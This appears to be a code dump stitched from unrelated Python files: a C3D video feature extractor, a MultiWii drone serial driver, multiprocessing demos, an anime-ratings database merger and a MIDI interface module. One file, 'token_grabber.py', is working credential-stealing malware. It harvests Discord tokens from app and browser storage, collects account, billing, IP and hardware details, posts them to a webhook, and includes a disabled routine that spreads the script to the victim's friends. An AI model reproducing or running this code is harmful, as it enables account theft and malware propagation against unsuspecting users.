512,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv5a',
subsample=(1, 1, 1),
trainable=False))
model.add(
Convolution3D(
512,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv5b',
subsample=(1, 1, 1),
trainable=False))
model.add(ZeroPadding3D(padding=(0, 1, 1), name='zeropadding'))
model.add(
MaxPooling3D(
pool_size=(2, 2, 2),
strides=(2, 2, 2),
border_mode='valid',
name='pool5'))
model.add(Flatten(name='flatten'))
# FC layers group
model.add(Dense(4096, activation='relu', name='fc6', trainable=False))
model.add(Dropout(.5, name='do1'))
model.add(Dense(4096, activation='relu', name='fc7'))
model.add(Dropout(.5, name='do2'))
model.add(Dense(487, activation='softmax', name='fc8'))
# Load weights
model.load_weights('data/models/c3d-sports1M_weights.h5')
for _ in range(4):
model.pop_layer()
if summary:
print(model.summary())
return model
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Extract video features using C3D network')
parser.add_argument(
'-d',
'--videos-dir',
type=str,
dest='directory',
default='data/videos',
help='videos directory (default: %(default)s)')
parser.add_argument(
'-o',
'--output-dir',
type=str,
dest='output',
default='data/dataset',
help=
'directory where to store the extracted features (default: %(default)s)'
)
parser.add_argument(
'-b',
'--batch-size',
type=int,
dest='batch_size',
default=32,
help='batch size when extracting features (default: %(default)s)')
parser.add_argument(
'-t',
'--num-threads',
type=int,
dest='num_threads',
default=8,
help='number of threads to fetch videos (default: %(default)s)')
parser.add_argument(
'-q',
'--queue-size',
type=int,
dest='queue_size',
default=12,
help=
'maximum number of elements at the queue when fetching videos (default %(default)s)'
)
parser.add_argument(
'-g',
'--num-gpus',
type=int,
dest='num_gpus',
default=1,
help=
'number of gpus to use for extracting features (default: %(default)s)')
args = parser.parse_args()
extract_features(args.directory, args.output, args.batch_size,
args.num_threads, args.queue_size, args.num_gpus)
|
multiwii.py | #/!usr/bin/env python
import time
import logging
import serial
import threading
import struct # for decoding data strings
class drone:
def __init__(self, port):
self.started = True
self.ATT = 0 # Ask and save the attitude of the multicopter
self.ALT = 0 # Ask and save the altitude of the multicopter
self.RC = 1 # Ask and save the pilot commands of the multicopter
self.SET_RC = 1 # Set rc command
self.MOT = 0 # Ask and save the PWM of the motors that the MW is writing to the multicopter
self.RAW = 0 # Ask and save the raw imu data of the multicopter
self.CMD = 0 # Send commands to the MW to control it
self.UDP = 0 # Save or use UDP data (to be adjusted)
self.ASY = 0 # Use async communicacion
self.SCK = 0 # Use regular socket communication
self.SCKSRV = 0 # Use socketserver communication
self.PRINT = 0 # Print data to terminal, useful for debugging
###############################
# Communication via serial port
###############################
self.port = port
self.ser=serial.Serial()
self.ser.port=self.port
self.ser.baudrate=115200
self.ser.bytesize=serial.EIGHTBITS
self.ser.parity=serial.PARITY_NONE
self.ser.stopbits=serial.STOPBITS_ONE
self.ser.timeout=0
self.ser.xonxoff=False
self.ser.rtscts=False
self.ser.dsrdtr=False
self.ser.writeTimeout=2
self.timeMSP=0.02
try:
self.ser.open()
except Exception, e:
logging.error("Error while open serial port: " + str(e))
exit()
###############################
# Multiwii Serial Protocol
# Hex value for MSP request
##############################
self.BASIC="\x24\x4d\x3c\x00" #MSG Send Header (to MultiWii)
self.MSP_IDT=self.BASIC+"\x64\x64" #MSG ID: 100
self.MSP_STATUS=self.BASIC+"\x65\x65" #MSG ID: 101
self.MSP_RAW_IMU=self.BASIC+"\x66\x66" #MSG ID: 102
self.MSP_SERVO=self.BASIC+"\x67\x67" #MSG ID: 103
self.MSP_MOTOR=self.BASIC+"\x68\x68" #MSG ID: 104
self.MSP_RC=self.BASIC+"\x69\x69" #MSG ID: 105
self.MSP_RAW_GPS=self.BASIC+"\x6A\x6A" #MSG ID: 106
self.MSP_ATTITUDE=self.BASIC+"\x6C\x6C" #MSG ID: 108
self.MSP_ALTITUDE=self.BASIC+"\x6D\x6D" #MSG ID: 109
self.MSP_BAT = self.BASIC+"\x6E\x6E" #MSG ID: 110
self.MSP_COMP_GPS=self.BASIC+"\x71\x71" #MSG ID: 111
self.MSP_SET_RC=self.BASIC+"\xC8\xC8" #MSG ID: 200
self.CMD2CODE = {
# Getter
'MSP_IDENT':100,
'MSP_STATUS':101,
'MSP_RAW_IMU':102,
'MSP_SERVO':103,
'MSP_MOTOR':104,
'MSP_RC':105,
'MSP_RAW_GPS':106,
'MSP_COMP_GPS':107,
'MSP_ATTITUDE':108,
'MSP_ALTITUDE':109,
'MSP_ANALOG':110,
'MSP_RC_TUNING':111,
'MSP_PID':112,
'MSP_BOX':113,
'MSP_MISC':114,
'MSP_MOTOR_PINS':115,
'MSP_BOXNAMES':116,
'MSP_PIDNAMES':117,
'MSP_WP':118,
'MSP_BOXIDS':119,
# Setter
'MSP_SET_RAW_RC':200,
'MSP_SET_RAW_GPS':201,
'MSP_SET_PID':202,
'MSP_SET_BOX':203,
'MSP_SET_RC_TUNING':204,
'MSP_ACC_CALIBRATION':205,
'MSP_MAG_CALIBRATION':206,
'MSP_SET_MISC':207,
'MSP_RESET_CONF':208,
'MSP_SET_WP':209,
'MSP_SWITCH_RC_SERIAL':210,
'MSP_IS_SERIAL':211,
'MSP_DEBUG':254,
}
###############################
# Initialize Global Variables
###############################
self.latitude = 0.0
self.longitude = 0.0
self.altitude = -0
self.heading = -0
self.timestamp = -0
self.gpsString = -0
self.numSats = -0
self.accuracy = -1
self.beginFlag = 0
self.roll = 0
self.pitch = 0
self.yaw = 0
self.throttle = 0
self.angx = 0.0
self.angy = 0.0
self.m1 = 0
self.m2 = 0
self.m3 = 0
self.m4 = 0
self.message = ""
self.ax = 0
selfay = 0
self.az = 0
self.gx = 0
self.gy = 0
self.gz = 0
self.magx = 0
self.magy = 0
self.magz = 0
self.elapsed = 0
self.flytime = 0
self.numOfValues = 0
self.precision = 3
self.rcData = [1500, 1500, 1500, 1500] #order -> roll, pitch, yaw, throttle
self.loopThread = threading.Thread(target=self.loop)
if self.ser.isOpen():
print("Wait 5 sec for calibrate Multiwii")
time.sleep(5)
self.loopThread.start()
def stop(self):
self.started = False
#############################################################
# littleEndian(value)
# receives: a parsed, hex data piece
# outputs: the decimal value of that data
# function: swaps byte by byte to convert little
# endian to big endian
# function: calls 2's compliment to convert to decimal
# returns: The integer value
#############################################################
def littleEndian(self, value):
length = len(value) # gets the length of the data piece
actual = ""
for x in range(0, length/2): #go till you've reach the halway point
actual += value[length-2-(2*x):length-(2*x)] #flips all of the bytes (the last shall be first)
x += 1
intVal = self.twosComp(actual) # sends the data to be converted from 2's compliment to int
return intVal # returns the integer value
###################################################################
# twosComp(hexValue)
# receives: the big endian hex value (correct format)
# outputs: the decimal value of that data
# function: if the value is negative, swaps all bits
# up to but not including the rightmost 1.
# Else, just converts straight to decimal.
# (Flip all the bits left of the rightmost 1)
# returns: the integer value
###################################################################
def twosComp(self, hexValue):
firstVal = int(hexValue[:1], 16)
if firstVal >= 8: # if first bit is 1
bValue = bin(int(hexValue, 16))
bValue = bValue[2:] # removes 0b header
newBinary = []
length = len(bValue)
index = bValue.rfind('1') # find the rightmost 1
for x in range(0, index+1): # swap bits up to rightmost 1
if x == index: #if at rightmost one, just append remaining bits
newBinary.append(bValue[index:])
elif bValue[x:x+1] == '1':
newBinary.append('0')
elif bValue[x:x+1] == '0':
newBinary.append('1')
x += 1
newBinary = ''.join(newBinary) # converts char array to string
finalVal = -int(newBinary, 2) # converts to decimal
return finalVal
else: # if not a negative number, simply convert to decimal
return int(hexValue, 16)
def sendData(self, data_length, code, data):
checksum = 0
total_data = ['$', 'M', '<', data_length, code] + data
for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]):
checksum = checksum ^ ord(i)
total_data.append(checksum)
try:
b = None
b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data))
except Exception, ex:
print 'send data error'
print(ex)
return b
#############################################################
# askRC()
# receives: nothing
# outputs: nothing
# function: Do everything to ask the MW for data and save it on globals
# returns: nothing
#############################################################
def askRC(self):
self.ser.flushInput() # cleans out the serial port
self.ser.flushOutput()
self.ser.write(self.MSP_RC) # gets RC information
time.sleep(self.timeMSP)
response = self.ser.readline()
if str(response) == "":
#print(msp_hex)
#print("Header: " + msp_hex[:6])
#payload = int(msp_hex[6:8])
#print("Payload: " + msp_hex[6:8])
#print("Code: " + msp_hex[8:10])
#print("RC data unavailable")
return
else:
msp_hex = response.encode("hex")
if msp_hex[10:14] == "":
print("roll unavailable")
else:
self.roll = float(self.littleEndian(msp_hex[10:14]))
if msp_hex[14:18] == "":
print("pitch unavailable")
else:
self.pitch = float(self.littleEndian(msp_hex[14:18]))
if msp_hex[18:22] == "":
print("yaw unavailable")
else:
self.yaw = float(self.littleEndian(msp_hex[18:22]))
if msp_hex[22:26] == "":
print("throttle unavailable")
else:
self.throttle = float(self.littleEndian(msp_hex[22:26]))
#print(str(self.roll) + " " + str(self.pitch) + " " + str(self.yaw) + " " + str(self.throttle))
def setRC(self):
self.sendData(8, self.CMD2CODE["MSP_SET_RAW_RC"], self.rcData)
time.sleep(self.timeMSP)
#print self.rcData
def loop(self):
print('success')
try:
#########################################################################
# Loop
#########################################################################
while self.started:
if self.SET_RC:
self.setRC()
if self.ATT:
askATT()
if self.ALT:
askALT()
if self.RC:
self.askRC()
if self.MOT:
askMOTOR()
if self.RAW:
askRAW()
if self.SCK:
getUDP()
"""
if beginFlag != 1: # Won't send any data until both altitude and heading are valid data
if self.TIME:
message = str(round(diff,precision))
if self.FLYT:
message = message+" "+str(round(elapsed,precision))
if self.ATT:
message = message+" "+str(angx)+" "+str(angy)+" "+str(heading)
if self.RC:
message = message+" "+str(roll)+" "+str(pitch)+" "+str(yaw)+" "+str(throttle)
if self.ALT:
message = message+" "+str(altitude)
if self.MOT:
message = message+" "+str(m1)+" "+str(m2)+" "+str(m3)+" "+str(m4)
if self.RAW:
message = message+" "+str(ax)+" "+str(ay)+" "+str(az)+" "+str(gx)+" "+str(gy)+" "+str(gz)+" "+str(magx)+" "+str(magy)+" "+str(magz)
if self.UDP:
if udp_mess == "":
message = message+" "+udp_mess2
udp_mess2=""
message = message+" "+udp_mess
if self.PRINT:
print(message)
else: # If invalid, continue looping
beginFlag = 0 # resets the flag """
self.ser.close()
file.close()
except Exception,e1: # Catches any errors in the serial communication
print("Error on main: "+str(e1))
|
test8.py | # import os
# import multiprocessing
#
#
# def foo(i):
# # 同样的参数传递方法
# print("这里是 ", multiprocessing.current_process().name)
# print('模块名称:', __name__)
# print('父进程 id:', os.getppid()) # 获取父进程id
# print('当前子进程 id:', os.getpid()) # 获取自己的进程id
# print('------------------------')
#
#
# if __name__ == '__main__':
#
# for i in range(50):
# p = multiprocessing.Process(target=foo, args=(i,))
# p.start()
# from multiprocessing import Process
#
# lis = []
#
#
# def foo(i):
# lis.append(i)
# lis.append(i)
# __import__('pprint').pprint(lis)
# print("This is Process ", i, " and lis is ", lis, " and lis.address is ", id(lis))
#
#
# if __name__ == '__main__':
# for i in range(5):
# p = Process(target=foo, args=(i,))
# p.start()
#
# p.join()
# print("The end of list_1:", lis)
from multiprocessing import Process
from multiprocessing import Manager
def func(i, dic):
# dic.insert(i, 100 + i)
dic[i] = 100 + i
print(dic)
if __name__ == '__main__':
dic = Manager().dict()
# dic = Manager().list()
for i in range(10):
p = Process(target=func, args=(i, dic))
p.start()
p.join()
print(dic)
|
token_grabber.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token Grabber By Astraa",
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("ENTER_YOUR_WBHOOK_URL", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
runner.py | import time
from train import main
from datetime import datetime, timedelta
from threading import Thread
def run():
print("Sleeping for 2 minutes now.")
time.sleep(120)
main()
def run_on_different_thread(fn):
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
while 1:
run_on_different_thread(fn=main)
dt = datetime.now() + timedelta(seconds=10)
while datetime.now() < dt:
time.sleep(1)
|
enzh_jp.py | import time
import pymysql
from fuzzywuzzy import process
from pymysql.cursors import DictCursor
from multiprocessing import Process
n = 1
animate_id = 100000
db1 = pymysql.connect("localhost", "root", "", "bidscore")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_en = db1.cursor(DictCursor)
cursor_zh = db1.cursor(DictCursor)
cursor_anikore = db1.cursor(DictCursor)
cursor = db2.cursor()
sql_en = "select * from en_db"
sql_zh = "select * from bidscore"
sql_anikore = "select * from anikore"
cursor_en.execute(sql_en)
cursor_zh.execute(sql_zh)
cursor_anikore.execute(sql_anikore)
items_en = cursor_en.fetchall()
items_zh = cursor_zh.fetchall()
items_anikore = cursor_anikore.fetchall()
zh_name_jp = []
zh_name_en = []
zh_name_zh = []
zh_score_douban = []
zh_score_imdb = []
zh_score_bangumi = []
zh_id = []
zh_starttime = []
zh_introduction = []
zh_area = []
zh_week = []
zh_cover = []
zh_cv = []
zh_info = []
zh_isfinish = []
for item_zh in items_zh:
zh_name_jp.append(item_zh["jp_name"])
zh_name_en.append(item_zh["eg_name"])
zh_name_zh.append(item_zh["ch_name"])
zh_score_douban.append(item_zh["D_score"])
zh_score_imdb.append(item_zh["I_score"])
zh_score_bangumi.append(item_zh["B_score"])
zh_id.append(item_zh["id"])
zh_starttime.append(item_zh["start_data"])
zh_introduction.append(item_zh["introduction"])
zh_area.append(item_zh["area"])
zh_week.append(item_zh["week"])
zh_cover.append(item_zh["cover"])
zh_cv.append(item_zh["cv"])
zh_info.append(item_zh["info"])
zh_isfinish.append(item_zh["is_finish"])
en_id = []
en_name_en = []
en_name_jp = []
en_score_mal = []
en_score_ann = []
en_score_anidb = []
en_member = []
for item_en in items_en:
en_id.append(item_en["en_id"])
en_name_en.append(item_en["name_en"])
en_name_jp.append(item_en["name_jp"])
en_score_mal.append(item_en["mal_rating"])
en_score_ann.append(item_en["ann_rating"])
en_score_anidb.append(item_en["anidb_rating"])
en_member.append(item_en["member"])
def match(anikore_name_jp, anikore_score, anikore_src, animate_id):
# print("日文:" + anikore_name_jp)
result = process.extractOne(anikore_name_jp, en_name_jp, score_cutoff=95)
if result is None:
result = process.extractOne(anikore_name_jp, en_name_en, score_cutoff=90)
if result is None:
result = process.extractOne(anikore_name_jp, en_name_jp)
if result is None:
en_name = "暂无"
mal_score = 0
ann_score = 0
anidb_score = 0
member = 0
else:
en_name = en_name_en[en_name_jp.index(result[0])]
mal_score = en_score_mal[en_name_jp.index(result[0])]
ann_score = en_score_ann[en_name_jp.index(result[0])]
anidb_score = en_score_anidb[en_name_jp.index(result[0])]
member = en_member[en_name_jp.index(result[0])]
else:
en_name = en_name_en[en_name_en.index(result[0])]
mal_score = en_score_mal[en_name_en.index(result[0])]
ann_score = en_score_ann[en_name_en.index(result[0])]
anidb_score = en_score_anidb[en_name_en.index(result[0])]
member = en_member[en_name_en.index(result[0])]
else:
en_name = en_name_en[en_name_jp.index(result[0])]
mal_score = en_score_mal[en_name_jp.index(result[0])]
ann_score = en_score_ann[en_name_jp.index(result[0])]
anidb_score = en_score_anidb[en_name_jp.index(result[0])]
member = en_member[en_name_jp.index(result[0])]
# print(result)
sql = "insert into animate(animate_id,name_jp,name_en,mal_rating,ann_rating,anidb_rating,anikore_rating,member) value (" \
"%s,%s,%s,%s,%s,%s,%s,%s) "
args = (animate_id, anikore_name_jp, en_name, mal_score, ann_score, anidb_score, anikore_score, member)
db2.ping(reconnect=True)
cursor.execute(sql, args)
db2.commit()
result = process.extractOne(anikore_name_jp, zh_name_jp, score_cutoff=95)
if result is None:
result = process.extractOne(anikore_name_jp, zh_name_en, score_cutoff=90)
if result is None:
result = process.extractOne(anikore_name_jp, zh_name_jp, score_cutoff=80)
if result is None:
cn_name = "暂无"
douban_score = 0
imdb_score = 0
bangumi_score = 0
bangumi_id = 0
startting = "暂无"
introduction = "暂无"
area = "暂无"
week = "暂无"
cover = "https://bangumi.tv/img/no_icon_subject.png"
cv = "暂无"
info = "暂无"
isfinish = 1
else:
cn_name = zh_name_zh[zh_name_jp.index(result[0])]
douban_score = zh_score_douban[zh_name_jp.index(result[0])]
imdb_score = zh_score_imdb[zh_name_jp.index(result[0])]
bangumi_score = zh_score_bangumi[zh_name_jp.index(result[0])]
bangumi_id = zh_id[zh_name_jp.index(result[0])]
startting = zh_starttime[zh_name_jp.index(result[0])]
introduction = zh_introduction[zh_name_jp.index(result[0])]
area = zh_area[zh_name_jp.index(result[0])]
week = zh_week[zh_name_jp.index(result[0])]
cover = zh_cover[zh_name_jp.index(result[0])]
cv = zh_cv[zh_name_jp.index(result[0])]
info = zh_info[zh_name_jp.index(result[0])]
isfinish = zh_isfinish[zh_name_jp.index(result[0])]
else:
cn_name = zh_name_zh[zh_name_en.index(result[0])]
douban_score = zh_score_douban[zh_name_en.index(result[0])]
imdb_score = zh_score_imdb[zh_name_en.index(result[0])]
bangumi_score = zh_score_bangumi[zh_name_en.index(result[0])]
bangumi_id = zh_id[zh_name_en.index(result[0])]
startting = zh_starttime[zh_name_en.index(result[0])]
introduction = zh_introduction[zh_name_en.index(result[0])]
area = zh_area[zh_name_en.index(result[0])]
week = zh_week[zh_name_en.index(result[0])]
cover = zh_cover[zh_name_en.index(result[0])]
cv = zh_cv[zh_name_en.index(result[0])]
info = zh_info[zh_name_en.index(result[0])]
isfinish = zh_isfinish[zh_name_en.index(result[0])]
else:
cn_name = zh_name_zh[zh_name_jp.index(result[0])]
douban_score = zh_score_douban[zh_name_jp.index(result[0])]
imdb_score = zh_score_imdb[zh_name_jp.index(result[0])]
bangumi_score = zh_score_bangumi[zh_name_jp.index(result[0])]
bangumi_id = zh_id[zh_name_jp.index(result[0])]
startting = zh_starttime[zh_name_jp.index(result[0])]
introduction = zh_introduction[zh_name_jp.index(result[0])]
area = zh_area[zh_name_jp.index(result[0])]
week = zh_week[zh_name_jp.index(result[0])]
cover = zh_cover[zh_name_jp.index(result[0])]
cv = zh_cv[zh_name_jp.index(result[0])]
info = zh_info[zh_name_jp.index(result[0])]
isfinish = zh_isfinish[zh_name_jp.index(result[0])]
# sql = 'update animate set name_cn="{}",area="{}",introduction="{}",douban_rating={},imdb_rating={},bangumi_rating={},' \
# 'start_time="{}",info="{}",cv="{}",cover="{}",week="{}",is_finish={},bangumi_idid={},anikore_url="{}" where animate_id={}'.format(
# cn_name, area, introduction, douban_score,
# imdb_score, bangumi_score, startting, info,
# cv, cover, week, isfinish, bangumi_id, anikore_src, animate_id)
# db2.ping(reconnect=True)
# cursor.execute(sql)
# db2.commit()
sql="update animate set name_cn=%s,area=%s,introduction=%s,douban_rating=%s,imdb_rating=%s,bangumi_rating=%s where animate_id=%s"
args=(cn_name, area, introduction, douban_score,imdb_score, bangumi_score,animate_id)
db2.ping(reconnect=True)
cursor.execute(sql,args)
db2.commit()
sql="update animate set start_time=%s,info=%s,cv=%s,cover=%s,week=%s,is_finish=%s,bangumi_idid=%s,anikore_url=%s where animate_id=%s"
args=(startting, info,cv, cover, week, isfinish, bangumi_id, anikore_src,animate_id)
db2.ping(reconnect=True)
cursor.execute(sql,args)
db2.commit()
print("-----------------已插入" + str(animate_id - 100000) + "条-----------------")
if __name__ == '__main__':
for item_anikore in items_anikore:
anikore_name_jp = item_anikore["jpname"]
anikore_score = item_anikore["score"]
anikore_src = item_anikore["src"]
animate_id += 1
p = Process(target=match, args=(anikore_name_jp,anikore_score,anikore_src,animate_id))
p.start()
time.sleep(0.5)
# match(anikore_name_jp, anikore_score, anikore_src, animate_id)
print("已完成!!!!!!!!!!!!!")
|
midi_hub.py | """A module for interfacing with the MIDI environment."""
import abc
from collections import defaultdict
from collections import deque
import Queue
import re
import threading
import time
# internal imports
import mido
import tensorflow as tf
# TODO(adarob): Use flattened imports.
from magenta.common import concurrency
from magenta.protobuf import music_pb2
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_PITCHES = [44, 35, 35, 35]
_DEFAULT_METRONOME_VELOCITY = 64
_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 8
try:
# The RtMidi backend is easier to install and has support for virtual ports.
import rtmidi # pylint: disable=unused-import,g-import-not-at-top
mido.set_backend('mido.backends.rtmidi')
except ImportError:
# Tries to use PortMidi backend by default.
tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubException(Exception):
"""Base class for exceptions in this module."""
pass
def get_available_input_ports():
"""Returns a list of available input MIDI ports."""
return mido.get_input_names()
def get_available_output_ports():
"""Returns a list of available output MIDI ports."""
return mido.get_output_names()
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
# A signal that matches a specific mido.Message exactly (ignoring time).
msg = mido.Message(type='control_signal', control=1, value=127)
control_1_127_signal = MidiSignal(msg=msg)
Args:
msg: A mido.Message that should be matched exactly (excluding the time
attribute) or None if wildcards are to be used.
**kwargs: Valid mido.Message arguments. Those that are not provided will be
treated as wildcards.
Raises:
MidiHubException: If the message type is unsupported or the arguments are
not in the valid set for the given or inferred type.
"""
_NOTE_ARGS = set(['type', 'note', 'program_number', 'velocity'])
_CONTROL_ARGS = set(['type', 'control', 'value'])
_VALID_ARGS = {
'note_on': _NOTE_ARGS,
'note_off': _NOTE_ARGS,
'control_change': _CONTROL_ARGS,
}
def __init__(self, msg=None, **kwargs):
if msg is not None and kwargs:
raise MidiHubException(
'Either a mido.Message should be provided or arguments. Not both.')
type_ = msg.type if msg is not None else kwargs.get('type')
if type_ is not None and type_ not in self._VALID_ARGS:
raise MidiHubException(
"The type of a MidiSignal must be either 'note_on', 'note_off', "
"'control_change' or None for wildcard matching. Got '%s'." % type_)
# The compatible mido.Message types.
inferred_types = [type_] if type_ is not None else []
# If msg is not provided, check that the given arguments are valid for some
# message type.
if msg is None:
if type_ is not None:
for arg_name in kwargs:
if arg_name not in self._VALID_ARGS[type_]:
raise MidiHubException(
"Invalid argument for type '%s': %s" % (type_, arg_name))
else:
if kwargs:
for name, args in self._VALID_ARGS.iteritems():
if set(kwargs) <= args:
inferred_types.append(name)
if not inferred_types:
raise MidiHubException(
'Could not infer a message type for set of given arguments: %s'
% ', '.join(kwargs))
# If there is only a single valid inferred type, use it.
if len(inferred_types) == 1:
type_ = inferred_types[0]
if msg is not None:
self._regex_pattern = '^' + mido.messages.format_as_string(
msg, include_time=False) + r' time=\d+.\d+$'
else:
# Generate regex pattern.
parts = ['.*' if type_ is None else type_]
for name in mido.messages.SPEC_BY_TYPE[inferred_types[0]][
'value_names']:
if name in kwargs:
parts.append('%s=%d' % (name, kwargs[name]))
else:
parts.append(r'%s=\d+' % name)
self._regex_pattern = '^' + ' '.join(parts) + r' time=\d+.\d+$'
def __str__(self):
"""Returns a regex pattern for matching against a mido.Message string."""
return self._regex_pattern
class Metronome(threading.Thread):
"""A thread implementing a MIDI metronome.
Args:
outport: The Mido port for sending messages.
qpm: The integer quarters per minute to signal on.
start_time: The float wall time in seconds to treat as the first beat
for alignment. If in the future, the first tick will not start until
after this time.
stop_time: The float wall time in seconds after which the metronome should
stop, or None if it should continue until `stop` is called.
velocity: The velocity of the metronome's tick `note_on` message.
program: The MIDI program number to use for metronome ticks.
pitches: An ordered collection of integes representing MIDI pitches of the
metronome's tick, which will be cycled through.
duration: The duration of the metronome's tick.
"""
daemon = True
def __init__(self,
outport,
qpm,
start_time,
stop_time=None,
velocity=_DEFAULT_METRONOME_VELOCITY,
program=_DEFAULT_METRONOME_PROGRAM,
pitches=None,
duration=_DEFAULT_METRONOME_TICK_DURATION):
self._outport = outport
self.update(
qpm, start_time, stop_time, velocity, program, pitches, duration)
super(Metronome, self).__init__()
def update(self,
qpm,
start_time,
stop_time=None,
velocity=_DEFAULT_METRONOME_VELOCITY,
program=_DEFAULT_METRONOME_PROGRAM,
pitches=None,
duration=_DEFAULT_METRONOME_TICK_DURATION):
"""Updates Metronome options."""
# Locking is not required since variables are independent and assignment is
